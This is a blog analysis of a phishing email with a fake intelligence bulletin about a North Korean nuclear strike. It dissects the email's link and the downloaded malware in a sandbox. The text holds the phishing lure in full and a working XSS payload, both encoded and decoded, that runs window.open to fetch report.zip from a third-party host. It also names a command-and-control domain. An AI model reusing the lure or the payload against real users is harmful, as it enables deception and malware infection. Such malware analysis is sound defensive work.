A Short Look into a Phishing Email

Citation: VnutZ, A Short Look into a Phishing Email, OmniNerd.com, 07 March 2010, accessed on 30 September 2014 from http://www.omninerd.com/articles/A_Short_Look_into_a_Phishing_Email
Tags: security, analysis, computing, and cyber

So the other day, I came out of the movie theater and checked my iPhone to see what I missed while being entertained by Alice in Wonderland. In my AKO mail was a curious looking message about North Korea having tested a missile with a nuclear detonation in Okinawa, Japan. The message indicated alerts being made for pending mobilization of military units. WTF?


Office of the Director of National Intelligence
INTELLIGENCE BULLETIN
UNCLASSIFIED//FOR OFFICIAL USE ONLY

(U//FOUO) DPRK has carried out nuclear missile attack on Japan

06 March 2010

(U//FOUO) Prepared by Defense Intelligence Agency

(U//FOUO) Today, March 06, 2010 at 11.46 AM local time (UTC/GMT -5 hours), US 
seismographic stations recorded seismic activity in the area of Okinawa Island 
(Japan). According to National Geospatial-Intelligence Agency, Democratic 
People's Republic of Korea has carried out an average range missile attack 
with use of nuclear warhead. The explosion caused severe destructions in the 
northern part of the Okinawa island. Casualties among the personnel of the US 
military base are being estimated at the moment.

(U//FOUO) In connection with the occurred events, it is necessary for the 
personnel of the services listed below to be ready for immediate mobilization:


CENTRAL INTELLIGENCE AGENCY

DEFENSE INTELLIGENCE AGENCY

DEPARTMENT OF ENERGY:
 OFFICE OF INTELLIGENCE AND COUNTERINTELLIGENCE 

DEPARTMENT OF HOMELAND SECURITY:
 OFFICE OF INTELLIGENCE AND ANALYSIS

DEPARTMENT OF STATE:
 BUREAU OF INTELLIGENCE AND RESEARCH 

DEPARTMENT OF THE TREASURY:
 OFFICE OF INTELLIGENCE AND ANALYSIS 

DRUG ENFORCEMENT ADMINISTRATION:
 OFFICE OF NATIONAL SECURITY INTELLIGENCE

FEDERAL BUREAU OF INVESTIGATION
 NATIONAL SECURITY BRANCH 

NATIONAL GEOSPATIAL-INTELLIGENCE AGENCY

NATIONAL RECONNAISSANCE OFFICE

NATIONAL SECURITY AGENCY

UNITED STATES AIR FORCE

UNITED STATES ARMY

UNITED STATES COAST GUARD

UNITED STATES MARINE CORPS

UNITED STATES NAVY
________________

(U//FOUO) Additional information can be found in the following report:

http://www.mod.gov.ge/2007/video/movie.php?
l=G&v=%22%3e%3c%61%20%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%6f%66%66%69%63%69
%61%6c%77%65%69%67%68%74%6c%6f%73%73%68%65%6c%70%2e%6f%72%67%2f%77%70%2d%61%64
%6d%69%6e%2f%72%65%70%6f%72%74%2e%7a%69%70%22%3e%44%6f%77%6e%6c%6f%61%64%20%3c
%2f%61%3e%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%70%65%6e%28%27%68%74
%74%70%3a%2f%2f%6f%66%66%69%63%69%61%6c%77%65%69%67%68%74%6c%6f%73%73%68%65%6c
%70%2e%6f%72%67%2f%77%70%2d%61%64%6d%69%6e%2f%72%65%70%6f%72%74%2e%7a%69%70%27
%29%3c%2f%73%63%72%69%70%74%3e%3c%22
________________
Office of the Director of National Intelligence
Washington, D.C. 20511

Naturally not clicking on the link for additional information, I turned to CNN, BBC and Google to confirm I did not miss Japan becoming the world’s only nuclear triple-crown winner. After a cursory search, it appeared Japan was still merely a champion of the nuclear doubleheader. It irritated me though that I was getting these phishing e-mails so I decided to see where they were coming from.

For starters, what were the substitutions hiding? A sequence like %20 is the percent-encoding of the hexadecimal byte value 0x20 (or 20h, depending on your preference), which is an index into the ASCII table. Because a URL cannot contain spaces, percent-encoding lets a URL carry %20 in place of the space. The same trick is used by digital miscreants to embed shellcode in a text string, but it can just as well hide ordinary text as numbers. Consulting a friendly ASCII table with hexadecimal lookups translates the “helpful link” into:


http://www.mod.gov.ge/2007/video/movie.php?l=G&v=">
<a href="http://officialweightlosshelp.org/wp-admin/report.zip">Download </a>
<script>window.open('http://officialweightlosshelp.org/wp-admin/report.zip')</script><"
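
The same decoding done programmatically, as an added example that is not part of the original article: it percent-decodes each query parameter of the link, flags any parameter that decodes to HTML markup, and lists the hosts that markup points at when they differ from the link's own host, which is the reflected-injection pattern the link above relies on. The URL constant is the link from the phishing mail, copied with its line breaks removed.

```python
from urllib.parse import urlsplit, parse_qs
import re

# The "additional information" link from the phishing mail, copied from the
# article with its line breaks removed. Only the v= parameter is encoded.
PHISH_URL = (
    "http://www.mod.gov.ge/2007/video/movie.php?l=G&v="
    "%22%3e%3c%61%20%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%6f%66%66%69%63%69"
    "%61%6c%77%65%69%67%68%74%6c%6f%73%73%68%65%6c%70%2e%6f%72%67%2f%77%70%2d%61%64"
    "%6d%69%6e%2f%72%65%70%6f%72%74%2e%7a%69%70%22%3e%44%6f%77%6e%6c%6f%61%64%20%3c"
    "%2f%61%3e%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%70%65%6e%28%27%68%74"
    "%74%70%3a%2f%2f%6f%66%66%69%63%69%61%6c%77%65%69%67%68%74%6c%6f%73%73%68%65%6c"
    "%70%2e%6f%72%67%2f%77%70%2d%61%64%6d%69%6e%2f%72%65%70%6f%72%74%2e%7a%69%70%27"
    "%29%3c%2f%73%63%72%69%70%74%3e%3c%22"
)

TAG_RE = re.compile(r"</?\s*([a-z][a-z0-9]*)", re.I)          # <a, </script, ...
HOST_RE = re.compile(r"https?://([^/\s'\"<>]+)", re.I)        # host part of any URL

def decode_params(url: str) -> dict:
    """Percent-decode every query parameter of url (first value per name)."""
    query = urlsplit(url).query
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}

def suspicious_params(url: str) -> dict:
    """Flag parameters whose decoded value contains HTML tags; for each, list
    the tags (in order of first appearance), whether a <script> is among them,
    and any hosts referenced that are not the host of the URL itself."""
    own_host = (urlsplit(url).hostname or "").lower()
    findings = {}
    for name, value in decode_params(url).items():
        tags = []
        for tag in (t.lower() for t in TAG_RE.findall(value)):
            if tag not in tags:
                tags.append(tag)
        if not tags:
            continue
        hosts = sorted({h.lower() for h in HOST_RE.findall(value)})
        findings[name] = {
            "tags": tags,
            "has_script": "script" in tags,
            "foreign_hosts": [h for h in hosts if h != own_host],
        }
    return findings

if __name__ == "__main__":
    for name, info in suspicious_params(PHISH_URL).items():
        print(f"{name}: {info}")
```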

So I turned to my VirtualBox testing environment from when I wrote What Traffic is on a TOR Relay and accessed the two websites to check them out safely without harming my machine.

[Screenshots: mod.gov.ge and officialweightlosshelp.org as viewed from the sandbox]

At first glance, it would seem a site in Georgia was being exploited by a cross-site scripting attack to redirect a viewer to a site that had previously been hacked (or fictitiously created) for file storage. Again, just a first glance would make somebody suspicious of Russian hackers, given their previous cyber issues with Georgia and the targeting of American military over AKO. But that’s just speculation – I’m not spending enough time on this to derive evidence to prove or disprove that theory.

Ultimately, all that really matters is that the attack is designed to download the file report.zip to the user’s computer. A hex analysis showed it to be a true ZIP file, so I used gzip in Linux to decompress it and then looked at the EXE file with a hex editor.

[Screenshot: hex dump of report.exe]

The dump of the imports section of the Portable Executable file reveals which functions this little program uses from the various DLLs, i.e. its Win32 API calls. It’s a little easier to read by simply running strings report.exe from the command line to dump the human-readable strings instead of finding them amidst the hexadecimal codes.


FormatMessageA
CloseHandle
ReadFile
CreateFileA
ExitProcess
GetFileType
HeapReAlloc
WaitForSingleObject
GetCurrentThread
LoadLibraryA
Sleep
GetStdHandle
HeapAlloc
HeapFree
GetProcessHeap
GetVersion
GetCommandLineA
GetModuleHandleA
KERNEL32.dll
InsertMenuW
LoadMenuW
DrawIconEx
CheckMenuItem
DispatchMessageA
PostThreadMessageA
CharNextExA
LoadStringA
wsprintfA
ExitWindowsEx
CloseClipboard
SetClipboardData
EmptyClipboard
OpenClipboard
DrawMenuBar
RemoveMenu
CheckMenuRadioItem
PostQuitMessage
TranslateMessage
DispatchMessageW
USER32.dll
ControlService
CloseServiceHandle
LookupPrivilegeValueA
AdjustTokenPrivileges
SetServiceStatus
SetSecurityDescriptorDacl
RegisterServiceCtrlHandlerA
RegEnumKeyA
RegSetValueExA
InitializeSecurityDescriptor
StartServiceCtrlDispatcherA
RegQueryValueExA
RegOpenKeyExA
RegCloseKey
ADVAPI32.dll
WS2_32.dll
strcat
strcmp
strchr
MSVCRT.dll
_exit
_XcptFilter
exit
__p___initenv
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_except_handler3
_controlfp

Now, without having to bother stepping through the code itself, it should be intuitively obvious to the most casual observer (as my high school physics teacher used to say) that the family of function calls centers around privilege checks, registry access, heap calls, service access and the Windows clipboard. Those sound like the functions necessary for heap and buffer overrun exploitation with checks to confirm escalated privilege. That means the bug is probably the result of a race condition, hence the privilege check prior to installing whatever final features it deploys as a Windows service. More than likely, now that the host is part of a BotNet, the remainder of the infection code (probably a rootkit) will then be downloaded from a control center for installation under the newly assumed administrator privileges. No obvious strings existed for network access to obtain the remainder of the code, so it’s likely the code itself is obfuscated by an internal encryption algorithm – which is fine because I didn’t want to spend time decoding opcodes anyway.
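
A way to do the same reading of an import listing by script, as an added example that is not the author's code: it groups the names from a strings listing under the DLL name that follows them and maps them onto the behaviours inferred above. The listing constant is an excerpt of the article's own strings output; a DLL with no names before it (WS2_32.dll in the listing) is most likely imported by ordinal, which is why strings shows no Winsock function names even though the program links against it.

```python
# Excerpt of the `strings report.exe` listing shown in the article: in the
# import table each DLL's function names precede the DLL name, and a DLL with
# no names before it (WS2_32.dll here) is most likely imported by ordinal.
STRINGS_EXCERPT = """\
LoadLibraryA
KERNEL32.dll
SetClipboardData
OpenClipboard
USER32.dll
ControlService
LookupPrivilegeValueA
AdjustTokenPrivileges
RegSetValueExA
StartServiceCtrlDispatcherA
ADVAPI32.dll
WS2_32.dll
strcat
MSVCRT.dll
"""

# Import names grouped into the behaviours the article infers from them.
CAPABILITIES = {
    "service": {"ControlService", "StartServiceCtrlDispatcherA",
                "RegisterServiceCtrlHandlerA", "SetServiceStatus"},
    "registry_write": {"RegSetValueExA"},
    "privilege": {"AdjustTokenPrivileges", "LookupPrivilegeValueA"},
    "clipboard": {"OpenClipboard", "SetClipboardData", "EmptyClipboard"},
}

def group_imports(listing: str) -> dict:
    """Map each DLL name to the function names listed just before it."""
    groups, pending = {}, []
    for line in filter(None, map(str.strip, listing.splitlines())):
        if line.lower().endswith(".dll"):
            groups[line], pending = pending, []
        else:
            pending.append(line)
    return groups

def triage(listing: str) -> dict:
    """Summarise capabilities and ordinal-only DLLs from a strings listing."""
    groups = group_imports(listing)
    names = {n for fns in groups.values() for n in fns}
    return {
        "capabilities": {c: sorted(names & fns) for c, fns in CAPABILITIES.items()
                         if names & fns},
        "ordinal_only": [d for d, fns in groups.items() if not fns],
    }
```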

Instead, I simply cloned a Windows sandbox in VirtualBox and allowed the infection to install itself while monitoring network activity with Wireshark. Running a stock Windows XP without any service packs, I accessed the Georgian Ministry of Defense page with the URL, whereupon the script did in fact execute the downloaded report.exe file. Wireshark showed name resolution for, and subsequent activity to, updatekernel.com, which was the predicted behavior. This server has previously been identified as Chinese in association with the command and control for the Kneber BotNets and other identity theft phishing activities. Needless to say, this variation did not show up on either the Symantec or ClamAV virus scanners, which may be a function of encrypting obfuscation or simply an updated variant with a new signature.

[Screenshot: Process Monitor log of report.exe]

[Post Edit 1] I actually re-ran this test today and found that apparently the particular link no longer works. It would seem the Georgian Ministry of Defense patched the vulnerability on their website that allowed the link to go through, but I’d saved a copy of the report.exe binary from before. I reverted the Windows XP sandbox to a pre-infection VirtualBox snapshot in order to install Service Pack 2. This was a necessary requirement for installing Process Monitor from Mark Russinovich’s fabled SysInternals toolkit. The screenshot above shows where Process Monitor logged all of report.exe’s activity to the registry and filesystem as it executed. A complete 35 page log is available here for your own perusal, but a lot of activity focuses around browsing the Internet cache, the stored certificates and the cryptologic functions. There was also a series of tests regarding registry accesses and post-clipboard functions. A more thorough analysis with a Win32 debugger to correlate each activity to a code section would, of course, provide a more detailed breakdown. The bottom line: it takes under two seconds for the code to execute, compromise your system and locate information that could be used to impersonate you or clone your credentials.

Let this be just another simple lesson of why you should not click on links sent to you in e-mails. Unless you like being part of a Russian/Chinese/DPRK BotNet and having your identity stolen.

[Screenshot: OllyDbg loading report.exe]

[Post Edit 2] I couldn’t resist. My cousin pointed me towards a shareware Win32 debugger called OllyDbg, so I went ahead and copied that into my sandbox. The last time I did this sort of thing, I was using the old-school DOS debug and Borland debuggers. Once again, I reverted to an older, pre-infection snapshot and loaded the report.exe file. Just as predicted, while the code loaded and OllyDbg performed its heuristic analysis, it indicated the primary code section was likely compressed or encrypted (as any attack should be). I think I’ve found my next source of distraction; I’m not going to be able to resist diving back into the world of reversing code puzzles. 0111 1010 0110 1001

This article was edited after publication by the author on 09 Mar 2010.